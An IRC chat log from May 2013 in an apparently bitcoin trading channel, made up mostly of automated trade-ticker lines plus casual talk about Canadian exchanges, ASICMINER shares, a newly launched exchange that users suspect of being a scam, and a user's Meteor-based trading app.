May 26 02:20:08 cause for canadians its the quickest option May 26 02:20:25 but canada has like 2 people total May 26 02:21:02 You only need two to trade. May 26 02:21:15 lol May 26 02:21:17 well look at their volume last month May 26 02:21:47 not bad, 700btc daily volume May 26 02:21:55 the site is not that great though May 26 02:22:41 but you can get some good deals May 26 02:23:55 there's also https://btcto.com but they show no data May 26 02:24:02 they are not open yet May 26 02:24:23 libertybit.ca is, but volume is low May 26 02:24:39 http://www.bitcoincharts.com/markets/virtexCAD_depth.html May 26 02:26:44 another canadian exchange will open and people will move there May 26 02:26:56 fees to high on virtex May 26 02:27:08 comparable to bitstamp May 26 02:28:37 (not the fees, i mean market-wise) May 26 02:31:19 i want to start a candian exchange May 26 02:32:15 Geez, people are bidding ฿25 for a single Jalapeno in hand. May 26 02:32:47 who said my name ? May 26 02:33:07 we know we're morons <- He did. May 26 02:34:13 o i c :p May 26 02:37:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02459 BTC [+] May 26 02:39:18 [MPEX] [S.MPOE] 5937 @ 0.0007525 = 4.4676 BTC [+] May 26 02:39:21 [MPEX] [S.MPOE] 6263 @ 0.00075257 = 4.7133 BTC [+] May 26 02:42:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.0244 BTC [-] May 26 02:43:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.02436 BTC [-] May 26 02:44:01 [HAVELOCK] [ASICM] 9 @ 0.0244 = 0.2196 BTC [-] May 26 02:44:03 [HAVELOCK] [ASICM] 60 @ 0.0243 = 1.458 BTC [-] May 26 02:44:09 [BTCTC] [TAT.ASICMINER] 8 @ 0.02435 = 0.1948 BTC [-] May 26 02:44:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.02411 = 0.0723 BTC [-] May 26 02:44:11 [BTCTC] [TAT.ASICMINER] 23 @ 0.0241 = 0.5543 BTC [-] May 26 02:45:38 ;;ticker May 26 02:45:40 BTCUSD ticker | Best bid: 131.12800, Best ask: 131.75700, Bid-ask spread: 0.62900, Last trade: 131.12800, 24 hour volume: 17214.88181096, 24 hour low: 128.20000, 24 hour high: 133.50000, 24 hour vwap: 130.93016 May 26 02:49:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.02459 BTC [+] May 26 02:59:29 anyone else think mtgox fees are still way too high? May 26 03:06:28 [BTCTC] [ASICMINER-PT] 1 @ 2.4399 BTC [+] May 26 03:07:43 [BTCTC] [ASICMINER-PT] 5 @ 2.44 = 12.2 BTC [+] May 26 03:09:36 [BTCTC] [TAT.ASICMINER] 3 @ 0.02459 = 0.0738 BTC [+] May 26 03:13:21 added additional: http://bitbet.us/bet/454/btc-network-difficulty-tops-25-million-by-end/?ref=1EteoRKNYbNhhmFfsKnUSWRF3JUpKCcMnc May 26 03:13:47 [BTCTC] [BITVPS] 25 @ 0.000858 = 0.0215 BTC [+] May 26 03:15:30 [BTCTC] [BITVPS] 200 @ 0.000858 = 0.1716 BTC [+] May 26 03:16:13 [BTCTC] [S.DICE-PT] 16 @ 0.00335 = 0.0536 BTC [+] May 26 03:20:41 [BTCTC] [COGNITIVE] 1 @ 0.344 BTC [-] May 26 03:23:01 [MPEX] [S.MPOE] 4749 @ 0.00075155 = 3.5691 BTC [-] May 26 03:23:05 [MPEX] [S.MPOE] 11500 @ 0.00075132 = 8.6402 BTC [-] May 26 03:23:07 [MPEX] [S.MPOE] 2551 @ 0.00075045 = 1.9144 BTC [-] May 26 03:25:02 [BTCTC] [TAT.ASICMINER] 8 @ 0.0246 = 0.1968 BTC [+] May 26 03:25:46 [BTCTC] [S.MPOE-PT] 1 @ 0.000744 BTC [+] May 26 03:25:47 [BTCTC] [S.MPOE-PT] 2 @ 0.000744 = 0.0015 BTC [+] May 26 03:25:52 [BTCTC] [S.MPOE-PT] 10 @ 0.000745 = 0.0075 BTC [+] May 26 03:27:21 KingCoin: I'm satisfied with libertybit May 26 03:28:15 [BTCTC] [S.MPOE-PT] 2 @ 0.000749 = 0.0015 BTC [+] May 26 03:28:38 [BTCTC] [S.MPOE-PT] 99 @ 0.00075 = 0.0743 BTC [+] May 26 03:28:48 [BTCTC] [S.MPOE-PT] 61 @ 0.00075 = 0.0458 BTC [+] May 26 03:29:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.02464 BTC [+] May 26 03:31:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.02464 = 0.0493 BTC [+] May 26 03:31:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.02464 BTC [+] May 26 03:49:23 [BTCTC] [TAT.ASICMINER] 22 @ 0.02464 = 0.5421 BTC [+] May 26 03:50:01 [HAVELOCK] [ASICM] 30 @ 0.0248 = 0.744 BTC [+] May 26 03:52:25 [BTCTC] [TAT.ASICMINER] 13 @ 0.02464 = 0.3203 BTC [+] May 26 03:53:13 [BTCTC] [TAT.ASICMINER] 4 @ 0.02464 = 0.0986 BTC [+] May 26 04:04:00 [HAVELOCK] [ASICM] 10 @ 0.0248 = 0.248 BTC [+] May 26 04:13:06 [MPEX] [S.MPOE] 7249 @ 0.00075045 = 5.44 BTC [-] May 26 04:13:09 [MPEX] [S.MPOE] 3626 @ 0.00075026 = 2.7204 BTC [-] May 26 04:15:52 [BTCTC] [TAT.ASICMINER] 7 @ 0.02464 = 0.1725 BTC [+] May 26 04:27:23 [BTCTC] [COGNITIVE] 1 @ 0.3449 BTC [+] May 26 04:28:00 [HAVELOCK] [ASICM] 5 @ 0.0248 = 0.124 BTC [+] May 26 04:29:48 [BTCTC] [BASIC-MINING] 1 @ 0.567999 BTC [+] May 26 04:33:08 [BTCTC] [TAT.ASICMINER] 5 @ 0.02464 = 0.1232 BTC [+] May 26 04:34:27 [BTCTC] [TAT.ASICMINER] 136 @ 0.02465 = 3.3524 BTC [+] May 26 04:35:55 [MPEX] [S.MPOE] 9454 @ 0.00075026 = 7.093 BTC [-] May 26 04:35:56 [MPEX] [S.MPOE] 4646 @ 0.00074994 = 3.4842 BTC [-] May 26 04:57:01 [HAVELOCK] [ASICM] 1 @ 0.0243 BTC [-] May 26 04:57:03 [HAVELOCK] [ASICM] 40 @ 0.0244 = 0.976 BTC [+] May 26 04:57:04 [HAVELOCK] [ASICM] 24 @ 0.0244 = 0.5856 BTC [+] May 26 04:57:04 [HAVELOCK] [ASICM] 20 @ 0.0243 = 0.486 BTC [-] May 26 04:57:59 [HAVELOCK] [ASICM] 1 @ 0.0243 BTC [-] May 26 05:11:09 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [+] May 26 05:17:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.02469 = 0.2469 BTC [+] May 26 05:24:47 [MPEX] [S.MPOE] 7054 @ 0.00074994 = 5.2901 BTC [-] May 26 05:24:49 [MPEX] [S.MPOE] 15746 @ 0.00074926 = 11.7978 BTC [-] May 26 05:26:42 [BTCTC] [TAT.ASICMINER] 10 @ 0.0247 = 0.247 BTC [+] May 26 05:32:37 [BTCTC] [S.DICE-PT] 2 @ 0.00337 = 0.0067 BTC [+] May 26 05:37:58 ;;bc,24hprc May 26 05:37:59 Error: Failed to retrieve data. Try again later. May 26 05:54:04 [BTCTC] [BTC-BOND] 10 @ 0.01035 = 0.1035 BTC [+] May 26 05:55:00 [HAVELOCK] [ASICM] 1 @ 0.0246 BTC [+] May 26 05:55:56 [BTCTC] [PAJKA.BOND] 1 @ 0.109989 BTC [+] May 26 05:56:54 [BTCTC] [B.YABMC] 1 @ 0.01747 BTC [+] May 26 05:57:01 [HAVELOCK] [ASICM] 20 @ 0.0246 = 0.492 BTC [+] May 26 05:57:37 [BTCTC] [B.YABMC] 1 @ 0.017479 BTC [+] May 26 05:58:12 [BTCTC] [B.YABMC] 52 @ 0.0175 = 0.91 BTC [+] May 26 05:58:14 [BTCTC] [B.YABMC] 6 @ 0.0183 = 0.1098 BTC [+] May 26 05:58:56 hi all May 26 05:59:03 [BTCTC] [PAJKA.BOND] 4 @ 0.109989 = 0.44 BTC [+] May 26 05:59:14 check out http://buttonwood.btcshares.com May 26 05:59:21 i just added a bunch of new features May 26 06:00:45 i think its pretty cool May 26 06:00:54 or at least getting there May 26 06:06:47 [MPEX] [S.MPOE] 4335 @ 0.00074926 = 3.248 BTC [-] May 26 06:06:59 [MPEX] [S.MPOE] 6300 @ 0.00074786 = 4.7115 BTC [-] May 26 06:07:00 [MPEX] [S.MPOE] 6168 @ 0.00074735 = 4.6097 BTC [-] May 26 06:11:18 [MPEX] [S.MPOE] 6500 @ 0.00074707 = 4.856 BTC [-] May 26 06:12:33 Submitting things doesn't work May 26 06:12:43 either the bid or the ask May 26 06:12:57 and there's not really any benefit to signing in May 26 06:14:28 But it looks nice May 26 06:19:41 [BTCTC] [BTC-BOND] 9 @ 0.0101 = 0.0909 BTC [-] May 26 06:20:00 [HAVELOCK] [ASICM] 30 @ 0.0246 = 0.738 BTC [+] May 26 06:25:41 parseval May 26 06:25:42 huh? May 26 06:25:56 you have to sign in to place orderse May 26 06:26:20 you might have pop up blocked or something cuz it alerts you to that May 26 06:26:31 if not signed in, it'll say "you must be logged in to place orders" May 26 06:26:44 if no price or size "need price and size" May 26 06:26:51 you have to create an account May 26 06:26:59 facebook, etc isn't working yet May 26 06:27:15 i may remove those for now May 26 06:27:55 Yeah, I signed in May 26 06:28:14 Must be because I used twitter.. oh well May 26 06:37:12 no prob May 26 06:37:20 yeah, you have to create an account for it to work May 26 06:37:25 i will remove those other options for now May 26 06:37:37 mjr___: what's this written in? May 26 06:37:42 PHP? May 26 06:38:00 [HAVELOCK] [ASICM] 23 @ 0.0246 = 0.5658 BTC [+] May 26 06:39:28 lol no May 26 06:39:32 its all js May 26 06:39:39 using the coolest new framework May 26 06:39:41 meteor May 26 06:39:48 based on mongo and node May 26 06:40:13 there I removed facebook, google and twitter May 26 06:40:15 for now May 26 06:40:30 but if you sign in, you will see the cool features May 26 06:40:39 if you are on the page, i will show you me pressing the update buttons May 26 06:40:49 its sub second updates across all devices as far as i've seen May 26 06:55:00 [HAVELOCK] [ASICM] 1 @ 0.0246 BTC [+] May 26 06:57:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.02481 = 0.2481 BTC [+] May 26 06:58:13 [BTCTC] [TAT.ASICMINER] 8 @ 0.02498 = 0.1998 BTC [+] May 26 06:59:38 [BTCTC] [TAT.ASICMINER] 15 @ 0.024989 = 0.3748 BTC [+] May 26 06:59:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.02499 = 0.1 BTC [+] May 26 07:10:14 even with a huge wall at 2.44, the spread on AM has only gotten smaller and smaller :) May 26 07:11:49 66 is huge? May 26 07:14:17 it was 100 and usually the wall is eaten or pulled back above 2.5 May 26 07:16:55 dub 200 bitcoin, a fortune. May 26 07:18:04 [BTCTC] [TAT.ASICMINER] 16 @ 0.024989 = 0.3998 BTC [-] May 26 07:19:01 anyone speculating on AM's moves this next week? I'm in long but curious May 26 07:19:30 should see decent dividend obviously May 26 07:19:43 [BTCTC] [TAT.ASICMINER] 67 @ 0.02499 = 1.6743 BTC [+] May 26 07:23:40 [BTCTC] [RSM] 85 @ 0.012159 = 1.0335 BTC [+] May 26 07:23:41 [BTCTC] [ASICMINER-PT] 4 @ 2.44 = 9.76 BTC [+] May 26 07:23:43 [BTCTC] [RSM] 1 @ 0.01216 BTC [+] May 26 07:23:44 [BTCTC] [RSM] 9 @ 0.012168 = 0.1095 BTC [+] May 26 07:30:39 yeah im thinkin maybe .03 as far as divs...I really do think AM has much higher to go. It will be interesting to see how Avalon and BFL do..eventually. May 26 07:31:44 abillionhorses are you new ? May 26 07:33:09 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [+] May 26 07:34:04 [BTCTC] [ASICMINER-PT] 4 @ 2.44 = 9.76 BTC [+] May 26 07:36:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.02499 = 0.05 BTC [+] May 26 07:37:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.02499 BTC [+] May 26 07:37:30 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [+] May 26 07:42:53 [BTCTC] [ASICMINER-PT] 1 @ 2.4352 BTC [-] May 26 07:47:00 [HAVELOCK] [ASICM] 2 @ 0.025 = 0.05 BTC [+] May 26 07:50:59 [HAVELOCK] [ASICM] 6 @ 0.025 = 0.15 BTC [+] May 26 07:54:59 [HAVELOCK] [ASICM] 101 @ 0.025 = 2.525 BTC [+] May 26 07:57:00 [HAVELOCK] [HIM] 1 @ 2.6011 BTC [+] May 26 07:58:00 [HAVELOCK] [HIM] 1 @ 2.6 BTC [-] May 26 08:02:00 [HAVELOCK] [VTX] 1 @ 0.4315 BTC [-] May 26 08:06:59 [BTCTC] [ASICMINER-PT] 3 @ 2.4352 = 7.3056 BTC [-] May 26 08:09:06 [BTCTC] [PAJKA.BOND] 6 @ 0.109989 = 0.6599 BTC [+] May 26 08:14:27 [MPEX] [S.MPOE] 27550 @ 0.00073369 = 20.2132 BTC [-] May 26 08:15:27 horses will always rule the world May 26 08:15:28 IMO May 26 08:15:52 they will thrive when the human race dies May 26 08:17:00 [HAVELOCK] [VTX] 7 @ 0.4315 = 3.0205 BTC [-] May 26 08:17:01 [HAVELOCK] [VTX] 4 @ 0.4311 = 1.7244 BTC [-] May 26 08:17:02 [HAVELOCK] [VTX] 1 @ 0.431 BTC [-] May 26 08:17:04 [HAVELOCK] [VTX] 5 @ 0.43 = 2.15 BTC [-] May 26 08:17:05 [HAVELOCK] [VTX] 6 @ 0.43 = 2.58 BTC [-] May 26 08:19:00 [HAVELOCK] [ASICM] 25 @ 0.02499999 = 0.625 BTC [-] May 26 08:20:00 [HAVELOCK] [ASICM] 11 @ 0.02499999 = 0.275 BTC [-] May 26 08:21:00 [HAVELOCK] [ASICM] 12 @ 0.02499999 = 0.3 BTC [-] May 26 08:22:00 [HAVELOCK] [VTX] 2 @ 0.43 = 0.86 BTC [-] May 26 08:22:01 [HAVELOCK] [VTX] 2 @ 0.4298 = 0.8596 BTC [-] May 26 08:22:01 [HAVELOCK] [VTX] 1 @ 0.42 BTC [-] May 26 08:26:00 [HAVELOCK] [ASICM] 12 @ 0.02499999 = 0.3 BTC [-] May 26 08:31:21 [BTCTC] [BTC-BOND] 2 @ 0.01035 = 0.0207 BTC [+] May 26 08:32:59 [HAVELOCK] [ASICM] 100 @ 0.02499999 = 2.5 BTC [-] May 26 08:34:50 [BTCTC] [ASICMINER-PT] 1 @ 2.4352 BTC [-] May 26 08:37:20 [BTCTC] [S.DICE-PT] 10 @ 0.0031 = 0.031 BTC [-] May 26 08:38:05 [BTCTC] [S.DICE-PT] 20 @ 0.003003 = 0.0601 BTC [-] May 26 08:38:07 [BTCTC] [S.DICE-PT] 1 @ 0.003003 BTC [-] May 26 08:38:09 [BTCTC] [S.DICE-PT] 35 @ 0.003002 = 0.1051 BTC [-] May 26 08:38:39 [BTCTC] [S.DICE-PT] 20 @ 0.003 = 0.06 BTC [-] May 26 08:38:49 [BTCTC] [PAJKA.BOND] 3 @ 0.109989 = 0.33 BTC [+] May 26 08:44:18 [BTCTC] [ASICMINER-PT] 4 @ 2.4352 = 9.7408 BTC [-] May 26 08:45:19 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [+] May 26 08:47:59 [BTCTC] [ASICMINER-PT] 2 @ 2.44 = 4.88 BTC [+] May 26 08:49:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.02499 = 0.05 BTC [+] May 26 08:52:00 [HAVELOCK] [ASICM] 50 @ 0.02499999 = 1.25 BTC [-] May 26 09:02:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.02499 BTC [+] May 26 09:07:31 [BTCTC] [TAT.ASICMINER] 7 @ 0.02499 = 0.1749 BTC [+] May 26 09:12:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.02499 BTC [+] May 26 09:13:44 [MPEX] [S.MPOE] 15850 @ 0.00073608 = 11.6669 BTC [+] May 26 09:13:46 [MPEX] [S.MPOE] 3225 @ 0.00073696 = 2.3767 BTC [+] May 26 09:13:57 [BTCTC] [BITVPS] 1 @ 0.000858 BTC [+] May 26 09:16:14 Mircea Popescu: Can you PLEASE give me the #bitcoin-anal channel May 26 09:19:14 [MPEX] [S.MPOE] 19496 @ 0.00073696 = 14.3678 BTC [+] May 26 09:19:16 [MPEX] [S.MPOE] 579 @ 0.00073965 = 0.4283 BTC [+] May 26 09:23:59 [HAVELOCK] [ASICM] 24 @ 0.02499999 = 0.6 BTC [-] May 26 09:40:00 [HAVELOCK] [HIM] 2 @ 2.6006 = 5.2012 BTC [+] May 26 09:42:18 are the asics open? May 26 09:43:00 [HAVELOCK] [ASICM] 41 @ 0.02499999 = 1.025 BTC [-] May 26 09:45:00 [HAVELOCK] [ASICM] 167 @ 0.025 = 4.175 BTC [+] May 26 09:53:18 KRS-1: check out the app now May 26 09:53:25 buttonwood.btcshares.com May 26 09:53:52 its coming along May 26 09:58:17 [BTCTC] [ASICMINER-PT] 53 @ 2.44 = 129.32 BTC [+] May 26 09:58:59 [HAVELOCK] [ASICM] 5 @ 0.02457 = 0.1229 BTC [-] May 26 09:59:01 [HAVELOCK] [ASICM] 78 @ 0.024322 = 1.8971 BTC [-] May 26 09:59:02 [HAVELOCK] [ASICM] 34 @ 0.02421 = 0.8231 BTC [-] May 26 09:59:03 [HAVELOCK] [ASICM] 23 @ 0.02421 = 0.5568 BTC [-] May 26 09:59:04 [HAVELOCK] [ASICM] 1 @ 0.0242 BTC [-] May 26 10:04:00 [HAVELOCK] [ASICM] 40 @ 0.0249 = 0.996 BTC [+] May 26 10:04:20 [BTCTC] [S.DICE-PT] 1 @ 0.003369 BTC [+] May 26 10:05:24 dice broken? May 26 10:07:35 [MPEX] [S.MPOE] 17971 @ 0.00073965 = 13.2923 BTC [+] May 26 10:08:00 [HAVELOCK] [ASICM] 2 @ 0.025 = 0.05 BTC [+] May 26 10:08:05 [BTCTC] [BITVPS] 3 @ 0.000858 = 0.0026 BTC [+] May 26 10:08:11 not that it stopped processing for like 30 minutes now May 26 10:08:23 or 1 hour May 26 10:14:11 [BTCTC] [ASICMINER-PT] 1 @ 2.4595 BTC [+] May 26 10:15:27 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [+] May 26 10:17:11 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [+] May 26 10:28:31 [MPEX] [S.MPOE] 17368 @ 0.00074085 = 12.8671 BTC [+] May 26 10:28:33 [MPEX] [S.MPOE] 11959 @ 0.00074202 = 8.8738 BTC [+] May 26 10:28:46 [MPEX] [S.MPOE] 2273 @ 0.0007425 = 1.6877 BTC [+] May 26 10:34:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.02455 BTC [-] May 26 10:35:42 [MPEX] [S.MPOE] 3277 @ 0.0007425 = 2.4332 BTC [+] May 26 10:41:02 [BTCTC] [ASICMINER-PT] 7 @ 2.46 = 17.22 BTC [+] May 26 10:41:06 [BTCTC] [ASICMINER-PT] 3 @ 2.464 = 7.392 BTC [+] May 26 10:42:55 [BTCTC] [TAT.ASICMINER] 9 @ 0.02455 = 0.221 BTC [-] May 26 10:42:59 [BTCTC] [TAT.ASICMINER] 76 @ 0.02499 = 1.8992 BTC [+] May 26 10:46:26 [BTCTC] [ASICMINER-PT] 2 @ 2.465 = 4.93 BTC [+] May 26 10:54:14 is there the same threat for okpay to be seized like for dwolla? May 26 10:58:35 [BTCTC] [S.DICE-PT] 19 @ 0.003369 = 0.064 BTC [+] May 26 10:58:36 [BTCTC] [S.DICE-PT] 1 @ 0.003369 BTC [+] May 26 10:59:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.02499 BTC [+] May 26 11:07:39 [MPEX] [S.MPOE] 2247 @ 0.00074728 = 1.6791 BTC [+] May 26 11:17:44 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1999 = 0.3998 BTC [-] May 26 11:17:48 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [-] May 26 11:21:28 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1999 = 0.3998 BTC [-] **** BEGIN LOGGING AT Sun May 26 15:15:08 2013 May 26 15:16:19 [MPEX] [S.MPOE] 7500 @ 0.00072971 = 5.4728 BTC [-] May 26 15:18:05 [BTCTC] [S.DICE-PT] 4 @ 0.00327 = 0.0131 BTC [-] May 26 15:30:45 [BTCTC] [ASICMINER-PT] 2 @ 2.4649 = 4.9298 BTC [+] May 26 15:31:27 [BTCTC] [BITVPS] 15 @ 0.000712 = 0.0107 BTC [-] May 26 15:31:29 [BTCTC] [BITVPS] 350 @ 0.000711 = 0.2489 BTC [-] May 26 15:31:30 [BTCTC] [BITVPS] 3 @ 0.00071 = 0.0021 BTC [-] May 26 15:31:32 [BTCTC] [BITVPS] 3 @ 0.00071 = 0.0021 BTC [-] May 26 15:31:36 [BTCTC] [BITVPS] 2 @ 0.00071 = 0.0014 BTC [-] May 26 15:31:37 [BTCTC] [ASICMINER-PT] 3 @ 2.465 = 7.395 BTC [+] May 26 15:31:39 [BTCTC] [BITVPS] 50 @ 0.0007 = 0.035 BTC [-] May 26 15:31:39 [BTCTC] [BITVPS] 3500 @ 0.000697 = 2.4395 BTC [-] May 26 15:35:01 [BTCTC] [BITVPS] 1 @ 0.00085 BTC [+] May 26 15:35:03 [BTCTC] [BITVPS] 9 @ 0.000856 = 0.0077 BTC [+] May 26 15:41:20 network broke the meter! http://www.asicminercharts.com/live/ May 26 15:41:22 lol May 26 15:41:24 ;;nethahs May 26 15:41:26 Error: "nethahs" is not a valid command. May 26 15:41:28 ;;nethash May 26 15:41:29 95544.6661855 May 26 15:42:56 ;;estimate May 26 15:42:56 Next difficulty estimate | 13635285.1153 based on data since last change | 13347232.0097 based on data for last three days May 26 15:43:18 ;;bc,stats May 26 15:43:20 Current Blocks: 238021 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 1882 blocks | Next Difficulty In About: 1 week, 3 days, 15 hours, 11 minutes, and 11 seconds | Next Difficulty Estimate: 13635285.1153 | Estimated Percent Change: 12.19307 May 26 15:55:40 mircea_popescu: http://o7.no/17aE3V7 May 26 15:56:00 aha ? May 26 15:58:11 mircea_popescu: not so instant? something down? May 26 15:58:49 i think there's some problems with the network at the moment May 26 15:59:15 where's the screencap from ? May 26 15:59:42 your homepage dude May 26 16:00:01 http://satoshidice.com/ - http://o7.no/11j1r9y May 26 16:00:58 how do you figure satoshidice is my homepage ? May 26 16:01:37 lmfao May 26 16:02:28 [BTCTC] [TAT.ASICMINER] 160 @ 0.02499 = 3.9984 BTC [+] May 26 16:02:54 sorry for some reason I was under the impression it was yours >.< hmm May 26 16:06:27 it's erik's. i run mpex. May 26 16:07:57 [MPEX] [S.MPOE] 6104 @ 0.00072971 = 4.4541 BTC [-] May 26 16:09:38 someone call erik May 26 16:21:30 [BTCTC] [TAT.ASICMINER] 107 @ 0.02499 = 2.6739 BTC [+] May 26 16:25:02 [HAVELOCK] [HIM] 1 @ 2.6006 BTC [-] May 26 16:26:02 [HAVELOCK] [VTX] 1 @ 0.4139 BTC [-] May 26 16:26:20 [BTCTC] [ASICMINER-PT] 10 @ 2.464 = 24.64 BTC [-] May 26 16:26:49 [BTCTC] [ASICMINER-PT] 1 @ 2.465 BTC [+] May 26 16:35:22 [MPEX] [S.MPOE] 32440 @ 0.00070331 = 22.8154 BTC [-] May 26 16:37:46 [MPEX] [S.MPOE] 14792 @ 0.00070331 = 10.4034 BTC [-] May 26 16:38:14 [BTCTC] [TAT.ASICMINER] 80 @ 0.02499 = 1.9992 BTC [+] May 26 16:41:12 crypto-trade just launched May 26 16:41:21 ve it May 26 16:41:29 cant believe it* May 26 16:42:47 HK company May 26 16:44:37 [BTCTC] [TAT.ASICMINER] 6 @ 0.02499 = 0.1499 BTC [+] May 26 16:45:46 [BTCTC] [ASICMINER-PT] 5 @ 2.44101 = 12.2051 BTC [-] May 26 16:46:40 [BTCTC] [CRYPTO-TRADE] 60 @ 0.2 = 12 BTC [+] May 26 16:47:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.02499 = 0.1499 BTC [+] May 26 16:50:10 same design as btc-e May 26 16:50:35 [BTCTC] [TAT.ASICMINER] 6 @ 0.02499 = 0.1499 BTC [+] May 26 16:50:59 135 gone May 26 16:51:05 fiat500 why can't believe ? May 26 16:51:48 mircea_popescu: they missed so many deadlines May 26 16:51:53 2 yesterday May 26 16:51:53 lol May 26 16:51:57 lolk May 26 16:52:07 yes May 26 16:52:54 resistance will build up as people add asks again May 26 16:53:05 people/bots/what have you May 26 16:53:46 the real problem is going to be all the "new" investors who bought in at 160 May 26 16:53:56 pretty sure those fuckers are going to panic sell as soon as they hit breakeven May 26 16:54:34 Chaang-Noi: most people are in this to make fiat May 26 16:54:50 do you really think there is enough faith in btc right now that people are buying it as a store of value? May 26 16:56:08 hah, crypto has a trollbox May 26 16:56:41 $1000 in 2 years? May 26 16:58:14 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] May 26 16:58:27 oh, btcusd you mean lol May 26 16:58:44 i thought net gain.. May 26 17:03:15 [BTCTC] [PAJKA.BOND] 4 @ 0.109989 = 0.44 BTC [+] May 26 17:04:24 hopefully May 26 17:06:57 [BTCTC] [CRYPTO-TRADE] 6 @ 0.2 = 1.2 BTC [+] May 26 17:15:07 [BTCTC] [CRYPTO-TRADE] 250 @ 0.2 = 50 BTC [+] May 26 17:15:18 feature request for bitbet: please display qr codes for bitcoin adresses. While browsing the web mostly on the desktop i have money for small payments and everyday usage on my android phone May 26 17:15:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.02499 = 0.1 BTC [+] May 26 17:18:58 it almost looks like cryptotrade launched.. except.. it seems broken May 26 17:19:27 yeah im not getting a confirmation email May 26 17:19:46 such is my lot in life, eh Ukto :P May 26 17:20:07 lol May 26 17:20:21 i mean.. they only take 2 forms of payment from what I gather on the site May 26 17:20:33 and they still have not updated the company address May 26 17:20:36 to not be a friggen datacenter May 26 17:21:01 maybe in hong kong people live inside DCs May 26 17:21:04 [BTCTC] [TAT.ASICMINER] 6 @ 0.02499 = 0.1499 BTC [+] May 26 17:21:14 honestly May 26 17:21:17 it looks like a scam launch May 26 17:21:29 "just did it" without any real means to use it May 26 17:21:33 or any real company info etc May 26 17:21:39 just so ppl will stop calling him a scammer May 26 17:21:46 Ukto i doubt anyone is taking it seriously. May 26 17:22:05 "were live!" == failed launch == 'not my problem, thanks for the btc! see? not a scammer!' :P May 26 17:22:08 prof7bit|away that actually is a great idea. kakobrekla think it's feasible ? May 26 17:23:09 [BTCTC] [BITVPS] 1 @ 0.000856 BTC [+] May 26 17:23:28 you just add an image to https://chart.googleapis.com/chart?chs=250x250&cht=qr&chld=L|0&chl=bitcoin:ADDRESSHERE May 26 17:23:29 done May 26 17:24:01 Ukto: they apparently take perfectmoney and gox usd lmfao May 26 17:24:21 impossible to take gox usd. ;) May 26 17:24:38 perfectmoney no longer accepts payments from US either May 26 17:24:54 perfect money is a very sketchy company too May 26 17:25:03 more so than alot of others May 26 17:25:15 the most use i can see for them May 26 17:25:19 is inter-ecurrency trades May 26 17:28:16 https://perfectmoney.com/news_view.html?id=342 May 26 17:28:22 ftr. May 26 17:29:24 [BTCTC] [S.MPOE-PT] 1 @ 0.00075 BTC [+] May 26 17:30:01 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] May 26 17:43:02 [BTCTC] [COGNITIVE] 1 @ 0.325 BTC [-] May 26 17:43:23 fiat500: confirmation email is in your spam box. prob because they run a few other sites and it happens May 26 17:43:42 no it just never sent, on 3rd attempt i received it May 26 17:45:48 thank you SD for not processing bets May 26 17:45:51 why do they get ny attention? May 26 17:46:29 any* May 26 17:46:40 need for another drama exchange? May 26 17:47:25 [BTCTC] [ASICMINER-PT] 1 @ 2.464 BTC [+] May 26 17:48:42 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [-] May 26 17:49:04 Mircea Popescu: Can you PLEASE give me the #bitcoin-anal channel May 26 17:49:22 ^lulz May 26 17:49:29 I'd like to be sysops in there May 26 17:49:29 KRS-1 big plans for anal? May 26 17:49:34 ;) May 26 17:49:39 or just big anal plans? May 26 17:50:00 I have some notes for it jotted down..perhaps May 26 17:50:14 so I'll need a home base so to speak May 26 17:50:14 fiat500: ah strange, worked for me. May 26 17:50:26 KRS-1 you know if you misspell my handle i don't get a ding May 26 17:50:37 anyway, what exactly are you trying to do that you can't do right now ? May 26 17:51:02 i'm not chan ops May 26 17:51:11 and thus... May 26 17:51:31 someone can take over the channel if it becomes in demand or something May 26 17:51:37 no they can't. May 26 17:51:41 Ukto: he already has stocks up and running with decent divs.. https://cryptostocks.com/securities/27 May 26 17:51:43 that's why it's registered. May 26 17:52:06 maybe KRS-1 wants to bleach it May 26 17:52:12 so like..if btc-anal becomes a ticker symbol on some far away exchange.. May 26 17:52:20 [BTCTC] [CRYPTO-TRADE] 35 @ 0.2 = 7 BTC [+] May 26 17:53:20 fuck May 26 17:53:33 are we strting the bubble again? May 26 17:53:34 its ok..ill figure out something May 26 17:53:54 this was keeping me up last night May 26 17:54:22 why exactly anyway ? just say whatever you want in there or w/e. May 26 17:54:50 yea true, but it has been marchin pretty steadily May 26 17:54:53 there are no sites for sex toys via btc? May 26 17:55:02 anal probes and such.. May 26 17:55:07 uck May 26 17:55:23 bitanal.com May 26 17:55:40 i call dibs May 26 17:55:50 ah man..come on May 26 17:57:46 ericmuyser: who? neotrix? May 26 17:58:09 I know, i stupidly bought into them and stuck with them now. May 26 17:58:22 that doesnt proove anything aginst my point May 26 17:59:22 my point is that regardless of if he puts much effort into making this simple, and highly volatile site without any core systems to it, he's profited. May 26 18:01:54 [MPEX] [S.MPOE] 